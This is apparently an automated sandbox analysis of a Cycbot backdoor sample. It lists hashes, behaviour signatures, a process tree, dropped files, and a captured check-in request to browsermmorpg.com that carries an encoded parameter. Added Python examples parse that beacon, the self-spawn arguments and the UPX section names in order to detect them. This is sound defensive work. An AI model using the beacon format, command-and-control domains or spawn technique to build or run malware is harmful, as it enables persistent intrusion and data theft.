Analysis

  • max time kernel
    140s
  • max time network
    120s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
  • submitted
    11/12/2024, 23:42 UTC

General

  • Target

    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe

  • Size

    168KB

  • MD5

    e3b819b82243a8eb75673a9bb77a2aaa

  • SHA1

    b62167d96bdb6437ec3fec596d95f5c7ce91b731

  • SHA256

    9d0eebe40aeedb7a33d6c93e1370a4b3a0d2c1ff7868b33f87672f4248f2d0c3

  • SHA512

    c4f2b5e467205406a0a4fb35f346152ea11972a2ade8f793b47a4e07600775fc6e80804b384d08354ee4cccd14c8cf41d0f639e241beab8ae96006b490592372

  • SSDEEP

    3072:3w0kxfJr+HMTthTtsOkmeD0wVoCin2c2mRO0edWnecPEH/dpQji+:ExV+sT6keD7obLFne+4H/8jN

Malware Config

Signatures

  • Cycbot

    Cycbot is a backdoor and trojan written in C++.

  • Cycbot family
  • Detects Cycbot payload 7 IoCs

    Cycbot is a backdoor and trojan written in C++.

  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • UPX packed file 9 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • System Location Discovery: System Language Discovery 1 TTPs 3 IoCs

    Attempts to gather information about the system language of the victim host in order to infer its geographical location.

  • Suspicious use of WriteProcessMemory 8 IoCs
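
The "UPX packed file" signature above is a static check; the usual tell is the section names (UPX0, UPX1) that the stock packer writes into the PE section table. The following is an added example of that check, not tria.ge's own detection logic: it parses the section table from the DOS and COFF headers and flags UPX names. The PE bytes it runs against are constructed inline by a helper (a header-only image, not the real sample), and the section-name set is an assumption covering stock UPX; a "modified UPX" build that renames its sections, which the signature text explicitly includes, will not be caught by a name match alone.

```python
"""Flag a PE image whose section table carries stock UPX section names.

Added example, not tria.ge's detection code. The PE bytes fed to it are built
by build_fake_pe() below (header only, never executable) so it runs offline.
"""
import struct

# Names written by stock UPX builds (assumption: covers unmodified UPX only).
UPX_SECTION_NAMES = {b"UPX0", b"UPX1", b"UPX2", b".UPX0", b".UPX1"}


def pe_section_names(data: bytes) -> list:
    """Return the 8-byte section names from a PE image's section table."""
    if data[:2] != b"MZ":
        raise ValueError("not a DOS/PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("missing PE signature")
    coff = e_lfanew + 4
    # COFF header: Machine(2) NumberOfSections(2) ... SizeOfOptionalHeader @ +16
    num_sections = struct.unpack_from("<H", data, coff + 2)[0]
    opt_size = struct.unpack_from("<H", data, coff + 16)[0]
    table = coff + 20 + opt_size           # section table follows the optional header
    names = []
    for i in range(num_sections):
        off = table + i * 40               # IMAGE_SECTION_HEADER is 40 bytes
        names.append(data[off:off + 8].rstrip(b"\0"))
    return names


def looks_upx_packed(data: bytes) -> bool:
    """True when any section name matches the stock UPX set."""
    return any(name in UPX_SECTION_NAMES for name in pe_section_names(data))


def build_fake_pe(section_names: list) -> bytes:
    """Construct a minimal PE32 header with the given sections (test input only)."""
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x40)  # e_lfanew points right after the DOS header
    opt_size = 0xE0                          # PE32 optional header size
    coff = struct.pack("<HHIIIHH", 0x014C, len(section_names), 0, 0, 0, opt_size, 0x0102)
    sections = b"".join(n.ljust(8, b"\0") + bytes(32) for n in section_names)
    return bytes(dos) + b"PE\0\0" + coff + bytes(opt_size) + sections


if __name__ == "__main__":
    packed = build_fake_pe([b"UPX0", b"UPX1", b".rsrc"])
    clean = build_fake_pe([b".text", b".data", b".rsrc"])
    print("packed:", looks_upx_packed(packed), "clean:", looks_upx_packed(clean))
```

Treat a name match as a hint, not proof: packers are routinely rebuilt with renamed sections, so a complementary check is the section entropy or the near-zero raw size of the first section, which the example leaves out.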

Processes

  • C:\Users\Admin\AppData\Local\Temp\e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe"
    1⤵
    • Modifies WinLogon for persistence
    • System Location Discovery: System Language Discovery
    • Suspicious use of WriteProcessMemory
    PID:2684
    • C:\Users\Admin\AppData\Local\Temp\e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
      C:\Users\Admin\AppData\Local\Temp\e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe startC:\Program Files (x86)\LP\2C08\619.exe%C:\Program Files (x86)\LP\2C08
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2780
    • C:\Users\Admin\AppData\Local\Temp\e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
      C:\Users\Admin\AppData\Local\Temp\e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe startC:\Program Files (x86)\F6D9E\lvvm.exe%C:\Program Files (x86)\F6D9E
      2⤵
      • System Location Discovery: System Language Discovery
      PID:2160
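
The process tree shows the sample re-launching its own image twice with an argument of the form `start<path-to-exe>%<directory>` (no space after `start`), one per dropped component. That self-spawn with a fused argument is a usable host-side detection. The following is an added example, not tria.ge's signature code, that runs the check over constructed process-creation records modelled on the tree above; the record format, the parent PID 1500 of the first process and the benign `cmd.exe` record are assumptions, since the report does not show them.

```python
"""Detect a process re-spawning its own image with a 'start<exe>%<dir>' argument.

Added example (not tria.ge's code). Records are constructed to mirror the
process tree in the report; the parent PID 1500 and the cmd.exe entry are made up.
"""
import re
from dataclasses import dataclass

# "<image> start<drive>:\...\x.exe%<drive>:\..." as seen in the report's child processes.
SELF_START_RE = re.compile(
    r'^"?(?P<image>\S+?\.exe)"?\s+start'
    r'(?P<target>[A-Za-z]:\\.+?\.exe)%(?P<dir>[A-Za-z]:\\.+)$'
)


@dataclass
class ProcEvent:
    pid: int
    ppid: int
    image: str
    cmdline: str


def parse_self_start(cmdline: str):
    """Return the image/target/dir fields when the command line matches, else None."""
    m = SELF_START_RE.match(cmdline)
    return m.groupdict() if m else None


def find_cycbot_style_spawns(events):
    """Flag children whose parent runs the same image and whose argument matches."""
    by_pid = {e.pid: e for e in events}
    hits = []
    for e in events:
        parsed = parse_self_start(e.cmdline)
        if parsed is None:
            continue
        parent = by_pid.get(e.ppid)
        if parent is not None and parent.image.lower() == e.image.lower():
            hits.append({"pid": e.pid, "ppid": e.ppid, **parsed})
    return hits


SAMPLE = ("C:\\Users\\Admin\\AppData\\Local\\Temp\\"
          "e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe")

# Constructed records mirroring the report's process tree (ppid 1500 is assumed).
EVENTS = [
    ProcEvent(2684, 1500, SAMPLE, f'"{SAMPLE}"'),
    ProcEvent(2780, 2684, SAMPLE,
              f"{SAMPLE} startC:\\Program Files (x86)\\LP\\2C08\\619.exe"
              "%C:\\Program Files (x86)\\LP\\2C08"),
    ProcEvent(2160, 2684, SAMPLE,
              f"{SAMPLE} startC:\\Program Files (x86)\\F6D9E\\lvvm.exe"
              "%C:\\Program Files (x86)\\F6D9E"),
    # Benign: a normal 'start' invocation has a space and no '%' separator.
    ProcEvent(3100, 1500, "C:\\Windows\\System32\\cmd.exe", "cmd.exe /c start notepad.exe"),
]

if __name__ == "__main__":
    for hit in find_cycbot_style_spawns(EVENTS):
        print(hit["pid"], "->", hit["target"], "in", hit["dir"])
```

The extracted `target` paths (`...\LP\2C08\619.exe`, `...\F6D9E\lvvm.exe`) are the payload locations to collect from a live host; the report's Downloads section only lists the `%AppData%\Roaming\818F6\6D9E.18F` file, so these paths should be checked separately.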

Network

  • Country: US
    DNS
    browsermmorpg.com
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    browsermmorpg.com
    IN A
    Response
    browsermmorpg.com
    IN A
    172.66.40.218
    browsermmorpg.com
    IN A
    172.66.43.38
  • Country: US
    GET
    http://browsermmorpg.com/img/intel.gif?pr=gHZutDyMv5rJfSG1J8K%2B1MWCJbP4lltXIA%3D%3D
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    Remote address:
    172.66.40.218:80
    Request
    GET /img/intel.gif?pr=gHZutDyMv5rJfSG1J8K%2B1MWCJbP4lltXIA%3D%3D HTTP/1.0
    Connection: close
    Host: browsermmorpg.com
    Accept: */*
    User-Agent: chrome/9.0
    Response
    HTTP/1.1 301 Moved Permanently
    Date: Thu, 12 Dec 2024 12:45:57 GMT
    Content-Type: text/html
    Content-Length: 167
    Connection: close
    Cache-Control: max-age=3600
    Expires: Thu, 12 Dec 2024 13:45:57 GMT
    Location: https://browsermmorpg.com/img/intel.gif?pr=gHZutDyMv5rJfSG1J8K%2B1MWCJbP4lltXIA%3D%3D
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KEbEVtZy7lSgUnv0Z4kTvXoANOkwX6DVGTfIOR%2F6inQmG%2BMQo%2FQEhuJRk3r2eWWDQblVJxgsM13MdOD5mD621mGHek6qVd1T1rXLwLooqXIyS79Alpx1XPgQWVGGAg6Q2TVzSA%3D%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f0dd084bf417792-LHR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=26128&min_rtt=26128&rtt_var=13064&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=158&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  • Country: US
    DNS
    webhomefordomains.com
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    webhomefordomains.com
    IN A
    Response
  • Country: US
    DNS
    ourthreedomains.com
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    ourthreedomains.com
    IN A
    Response
  • Country: US
    DNS
    www.google.com
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    Remote address:
    8.8.8.8:53
    Request
    www.google.com
    IN A
    Response
    www.google.com
    IN A
    172.217.20.164
  • Country: FR
    GET
    http://www.google.com/
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    Remote address:
    172.217.20.164:80
    Request
    GET / HTTP/1.0
    Connection: close
    Host: www.google.com
    Accept: */*
    Response
    HTTP/1.0 302 Found
    Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGMG267oGIjBRMDaJnXn7YIe4OexjXXCRY4tW-BpbjZMY0AIGTZVQWWJxUxlOApdscxO3H6UEF_QyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    x-hallmonitor-challenge: CgwIwrbrugYQuaCNggESBLXXsFM
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-_sQg24OtM2YtKCo-hpcs5g' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
    Date: Thu, 12 Dec 2024 12:46:58 GMT
    Server: gws
    Content-Length: 396
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: AEC=AZ6Zc-WyUliopSVXMcxDE9hYAhgDkFE90ACkaAM2gtCYIu5cPmTqfh5YSzA; expires=Tue, 10-Jun-2025 12:46:58 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
  • Country: FR
    GET
    http://www.google.com/
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    Remote address:
    172.217.20.164:80
    Request
    GET / HTTP/1.1
    Connection: close
    Pragma: no-cache
    Host: www.google.com
    Response
    HTTP/1.1 302 Found
    Location: http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGMK267oGIjAX13aSYGNauAQe--hSXTuOjvZ7r5x1dz1BEbRN-y4ogSTQBApNwBSvhjX8HYowvGwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    x-hallmonitor-challenge: CgwIwrbrugYQ_uOdhQMSBLXXsFM
    Content-Type: text/html; charset=UTF-8
    Content-Security-Policy-Report-Only: object-src 'none';base-uri 'self';script-src 'nonce-BZrbOST1OoOxXE7choE89w' 'strict-dynamic' 'report-sample' 'unsafe-eval' 'unsafe-inline' https: http:;report-uri https://csp.withgoogle.com/csp/gws/other-hp
    Date: Thu, 12 Dec 2024 12:46:58 GMT
    Server: gws
    Content-Length: 396
    X-XSS-Protection: 0
    X-Frame-Options: SAMEORIGIN
    Set-Cookie: AEC=AZ6Zc-UXAlg24NUv7rUGmkm3MnGY9quStrZeRPlGmNoAGOKe9NTQSxPRtg; expires=Tue, 10-Jun-2025 12:46:58 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=lax
    Connection: close
  • Country: FR
    GET
    http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGMK267oGIjAX13aSYGNauAQe--hSXTuOjvZ7r5x1dz1BEbRN-y4ogSTQBApNwBSvhjX8HYowvGwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    Remote address:
    172.217.20.164:80
    Request
    GET /sorry/index?continue=http://www.google.com/&q=EgS117BTGMK267oGIjAX13aSYGNauAQe--hSXTuOjvZ7r5x1dz1BEbRN-y4ogSTQBApNwBSvhjX8HYowvGwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1
    Connection: close
    Pragma: no-cache
    Host: www.google.com
    Response
    HTTP/1.1 429 Too Many Requests
    Date: Thu, 12 Dec 2024 12:46:58 GMT
    Pragma: no-cache
    Expires: Fri, 01 Jan 1990 00:00:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Content-Type: text/html
    Server: HTTP server (unknown)
    Content-Length: 3075
    X-XSS-Protection: 0
    Connection: close
  • 172.66.40.218:80
    http://browsermmorpg.com/img/intel.gif?pr=gHZutDyMv5rJfSG1J8K%2B1MWCJbP4lltXIA%3D%3D
    http
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    388 B
    1.3kB
    5
    5

    HTTP Request

    GET http://browsermmorpg.com/img/intel.gif?pr=gHZutDyMv5rJfSG1J8K%2B1MWCJbP4lltXIA%3D%3D

    HTTP Response

    301
  • 172.217.20.164:80
    http://www.google.com/
    http
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    302 B
    1.5kB
    5
    5

    HTTP Request

    GET http://www.google.com/

    HTTP Response

    302
  • 172.217.20.164:80
    http://www.google.com/
    http
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    307 B
    1.5kB
    5
    5

    HTTP Request

    GET http://www.google.com/

    HTTP Response

    302
  • 172.217.20.164:80
    http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGMK267oGIjAX13aSYGNauAQe--hSXTuOjvZ7r5x1dz1BEbRN-y4ogSTQBApNwBSvhjX8HYowvGwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM
    http
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    526 B
    3.7kB
    6
    7

    HTTP Request

    GET http://www.google.com/sorry/index?continue=http://www.google.com/&q=EgS117BTGMK267oGIjAX13aSYGNauAQe--hSXTuOjvZ7r5x1dz1BEbRN-y4ogSTQBApNwBSvhjX8HYowvGwyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM

    HTTP Response

    429
  • 127.0.0.1:61030
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
  • 127.0.0.1:61030
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
  • 8.8.8.8:53
    browsermmorpg.com
    dns
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    63 B
    95 B
    1
    1

    DNS Request

    browsermmorpg.com

    DNS Response

    172.66.40.218
    172.66.43.38

  • 8.8.8.8:53
    webhomefordomains.com
    dns
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    67 B
    140 B
    1
    1

    DNS Request

    webhomefordomains.com

  • 8.8.8.8:53
    ourthreedomains.com
    dns
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    65 B
    138 B
    1
    1

    DNS Request

    ourthreedomains.com

  • 8.8.8.8:53
    www.google.com
    dns
    e3b819b82243a8eb75673a9bb77a2aaa_JaffaCakes118.exe
    60 B
    76 B
    1
    1

    DNS Request

    www.google.com

    DNS Response

    172.217.20.164
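
The only traffic to a non-Google host is the check-in to browsermmorpg.com: a `GET /img/intel.gif?pr=<url-encoded base64>` over HTTP/1.0 with `Connection: close` and a `User-Agent: chrome/9.0` that no real browser sends (Chrome's UA starts with `Mozilla/5.0`). The `pr` value decodes to 25 bytes of opaque data; the report does not say how it is encrypted, and the example below does not try. The following is an added example, not tria.ge's signature, that parses a constructed copy of that captured request and reports which of those indicators it carries; the indicator names are this example's own.

```python
"""Parse the captured Cycbot check-in request and list its beacon indicators.

Added example (not tria.ge's code). BEACON_REQUEST is a constructed copy of the
request shown in the report, not a live capture; indicator names are this
example's own labels.
"""
import base64
import binascii
from typing import Optional
from urllib.parse import parse_qs, urlsplit

BEACON_REQUEST = (
    "GET /img/intel.gif?pr=gHZutDyMv5rJfSG1J8K%2B1MWCJbP4lltXIA%3D%3D HTTP/1.0\r\n"
    "Connection: close\r\n"
    "Host: browsermmorpg.com\r\n"
    "Accept: */*\r\n"
    "User-Agent: chrome/9.0\r\n"
    "\r\n"
)

IMAGE_SUFFIXES = (".gif", ".png", ".jpg")


def parse_http_request(raw: str) -> dict:
    """Split a raw HTTP/1.x request into method, target, version and lowercase headers."""
    head, _, _body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    method, target, version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return {"method": method, "target": target, "version": version, "headers": headers}


def decode_pr_param(target: str) -> Optional[bytes]:
    """Return the base64-decoded 'pr' query value, or None if absent or not valid base64."""
    values = parse_qs(urlsplit(target).query).get("pr")
    if not values:
        return None
    try:
        return base64.b64decode(values[0], validate=True)
    except (binascii.Error, ValueError):
        return None


def beacon_indicators(req: dict) -> list:
    """Return the labels of the beacon traits present in a parsed request."""
    hits = []
    ua = req["headers"].get("user-agent", "")
    if not ua.startswith("Mozilla/"):
        hits.append("non-browser-user-agent")
    if req["version"] == "HTTP/1.0" and req["headers"].get("connection", "").lower() == "close":
        hits.append("http10-connection-close")
    path = urlsplit(req["target"]).path.lower()
    if path.endswith(IMAGE_SUFFIXES) and decode_pr_param(req["target"]) is not None:
        hits.append("base64-blob-in-image-query")
    return hits


if __name__ == "__main__":
    req = parse_http_request(BEACON_REQUEST)
    blob = decode_pr_param(req["target"])
    print(req["headers"]["host"], req["target"], len(blob), "bytes")
    print(beacon_indicators(req))
```

Each indicator on its own is weak (old scripts also send HTTP/1.0), so the useful alert is the combination, scoped to a request for an image path whose query carries a decodable blob. Note also that the server answered 301 to HTTPS, so the same beacon on a current host would likely be sent over TLS, where only the DNS lookup and the SNI remain visible.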

MITRE ATT&CK Enterprise v15

Downloads

  • C:\Users\Admin\AppData\Roaming\818F6\6D9E.18F

    Filesize

    1KB

    MD5

    3643660ea67a8ae07cf199ea5fcb5991

    SHA1

    a4e95f7874653c887785275886301f224a689357

    SHA256

    a0b1d1aeaacc2051f8c1e3de4a8bf81e7a407988f972928481b8b24bd94d6a7b

    SHA512

    706f77c167dcd406a04a782da0abb3d9d1fc0c826b4cd4de8dc2581eed63975002cd1f1833665899f3dc5e285c5397dc6cb244c09c34fa47d359b47b2b7d56a2

  • C:\Users\Admin\AppData\Roaming\818F6\6D9E.18F

    Filesize

    600B

    MD5

    b309ffe47dd91194016bf75b4ea9fa9d

    SHA1

    bc792c3d9cd985b8fa16298a31ed7dd7e11f32be

    SHA256

    08da11f91acb095c9149272dd41053642bca2965534d864b6c67105e608ccc70

    SHA512

    b605edc88ccf83a3d498fee9aff3b03fd66de9a441f93f4e13b1f607678f67863e56aa8aff0623745d0ce4c46e2b523eea35092a927a180335a522113178ace6

  • C:\Users\Admin\AppData\Roaming\818F6\6D9E.18F

    Filesize

    996B

    MD5

    2ff734db2d3930a5fe2ae317832bf504

    SHA1

    484d218e567ef13f461580ed9ecffe25a53a1414

    SHA256

    13c53f68727a78e7309dd65d9076d42af4a98af0fbb5439df4142197d5103b79

    SHA512

    1d7def9db7e0c4fbaf8401fd5db8fdb6e08187158cfdc60d06343a683c78bd3624e25662c4941ea96a1c903af3f5809049f041b6d02464f7cc92678b21edc555

  • memory/2160-77-0x0000000000400000-0x0000000000490000-memory.dmp

    Filesize

    576KB

  • memory/2160-79-0x0000000000400000-0x0000000000490000-memory.dmp

    Filesize

    576KB

  • memory/2160-78-0x0000000000400000-0x0000000000490000-memory.dmp

    Filesize

    576KB

  • memory/2684-16-0x0000000000400000-0x0000000000490000-memory.dmp

    Filesize

    576KB

  • memory/2684-1-0x0000000000400000-0x000000000048D000-memory.dmp

    Filesize

    564KB

  • memory/2684-75-0x0000000000400000-0x0000000000490000-memory.dmp

    Filesize

    576KB

  • memory/2684-15-0x0000000000400000-0x000000000048D000-memory.dmp

    Filesize

    564KB

  • memory/2684-2-0x0000000000400000-0x0000000000490000-memory.dmp

    Filesize

    576KB

  • memory/2684-182-0x0000000000400000-0x0000000000490000-memory.dmp

    Filesize

    576KB

  • memory/2780-12-0x0000000000400000-0x0000000000490000-memory.dmp

    Filesize

    576KB

  • memory/2780-14-0x0000000002160000-0x00000000021DB000-memory.dmp

    Filesize

    492KB

  • memory/2780-13-0x0000000000400000-0x000000000048D000-memory.dmp

    Filesize

    564KB
